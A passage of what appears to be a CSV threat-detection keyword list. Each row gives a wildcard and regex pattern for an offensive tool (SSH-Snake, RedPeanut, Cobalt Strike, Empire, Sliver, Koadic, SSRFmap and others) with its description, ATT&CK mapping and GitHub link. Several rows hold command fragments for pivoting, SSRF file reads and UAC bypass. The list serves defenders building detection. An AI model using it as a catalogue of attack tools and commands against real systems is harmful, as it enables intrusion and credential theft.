T1558.003","TA0002 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mthbernardes/sshLooterC","1","1","N/A","N/A","3","256","82","2023-06-08T21:12:10Z","2018-12-19T20:25:11Z" "*ssh-mitm*",".{0,1000}ssh\-mitm.{0,1000}","offensive_tool_keyword","ssh-mitm","An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.","T1040 - T1071 - T1552","TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/jtesta/ssh-mitm","1","1","N/A","N/A","10","1584","198","2021-07-02T02:17:26Z","2017-05-16T19:55:10Z" "*sshmon*hunt*",".{0,1000}sshmon.{0,1000}hunt.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*sshmon*kill*",".{0,1000}sshmon.{0,1000}kill.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*ssh-putty-brute -*",".{0,1000}ssh\-putty\-brute\s\-.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","272","82","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" "*ssh-putty-brute.ps1*",".{0,1000}ssh\-putty\-brute\.ps1.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","272","82","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" "*SSH-PuTTY-login-bruteforcer*",".{0,1000}SSH\-PuTTY\-login\-bruteforcer.{0,1000}","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","272","82","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" "*ssh-shellhost.exe*",".{0,1000}ssh\-shellhost\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*SSHSnake.log*",".{0,1000}SSHSnake\.log.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*SSH-Snake-main*",".{0,1000}SSH\-Snake\-main.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*sshuttle -r *0.0.0.0/24*",".{0,1000}sshuttle\s\-r\s.{0,1000}0\.0\.0\.0\/24.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*sslstrip*",".{0,1000}sslstrip.{0,1000}","offensive_tool_keyword","sslstrip","sslstrip is a MITM tool that implements Moxie Marlinspikes SSL stripping attacks.","T1557.001 - T1573 - T1559 - T1542 - T1552","TA0002 - TA0011 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/moxie0/sslstrip","1","1","N/A","N/A","10","1873","421","2021-05-29T01:53:12Z","2011-04-24T06:40:08Z" "*SspiUacBypass.cpp*",".{0,1000}SspiUacBypass\.cpp.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*SspiUacBypass.exe*",".{0,1000}SspiUacBypass\.exe.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*SspiUacBypass-main*",".{0,1000}SspiUacBypass\-main.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*SSploitEnumeration*",".{0,1000}SSploitEnumeration.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitEnumerationDomain*",".{0,1000}SSploitEnumerationDomain.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitExecution_DynamicInvoke*",".{0,1000}SSploitExecution_DynamicInvoke.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitExecution_Injection*",".{0,1000}SSploitExecution_Injection.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitLateralMovement*",".{0,1000}SSploitLateralMovement.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitPersistence*",".{0,1000}SSploitPersistence.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SSploitPrivilegeEscalation*",".{0,1000}SSploitPrivilegeEscalation.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*sspr2john.py*",".{0,1000}sspr2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*--ssrf --gopher --encode --scan-action filter-bypass*",".{0,1000}\-\-ssrf\s\-\-gopher\s\-\-encode\s\-\-scan\-action\sfilter\-bypass.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*ssrfmap -r *.txt -p id -m readfiles*portscan*",".{0,1000}ssrfmap\s\-r\s.{0,1000}\.txt\s\-p\sid\s\-m\sreadfiles.{0,1000}portscan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*SSRFmap*",".{0,1000}SSRFmap.{0,1000}","offensive_tool_keyword","SSRFmap","SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.","T1210.001 - T1190 - T1191 - T1505 - T1213","TA0007 - TA0002 - TA0008 - TA0001","N/A","N/A","Web Attacks","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2756","484","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "*ssrfmap.py*",".{0,1000}ssrfmap\.py.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2756","484","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "*SSSDKCMExtractor.py*",".{0,1000}SSSDKCMExtractor\.py.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*StackCrypt-main*",".{0,1000}StackCrypt\-main.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.cpp*",".{0,1000}StackEncrypt\.cpp.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.exe*",".{0,1000}StackEncrypt\.exe.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.sln*",".{0,1000}StackEncrypt\.sln.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*StackEncrypt.vcxproj*",".{0,1000}StackEncrypt\.vcxproj.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*stage.obfuscate*",".{0,1000}stage\.obfuscate.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*stage_smartinject*",".{0,1000}stage_smartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*stage_transform_x64_prepend*",".{0,1000}stage_transform_x64_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*stage_transform_x64_strrep1*",".{0,1000}stage_transform_x64_strrep1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*stage_transform_x86_prepend*",".{0,1000}stage_transform_x86_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*stage_transform_x86_strrep1*",".{0,1000}stage_transform_x86_strrep1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*stage1-remotepipelist.py*",".{0,1000}stage1\-remotepipelist\.py.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*Stage-gSharedInfoBitmap*",".{0,1000}Stage\-gSharedInfoBitmap.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*stageless payload*",".{0,1000}stageless\spayload.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*StageListenerCmd*",".{0,1000}StageListenerCmd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*stager/js/bitsadmin *",".{0,1000}stager\/js\/bitsadmin\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/disk*",".{0,1000}stager\/js\/disk.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/mshta*",".{0,1000}stager\/js\/mshta.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/regsvr *",".{0,1000}stager\/js\/regsvr\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - 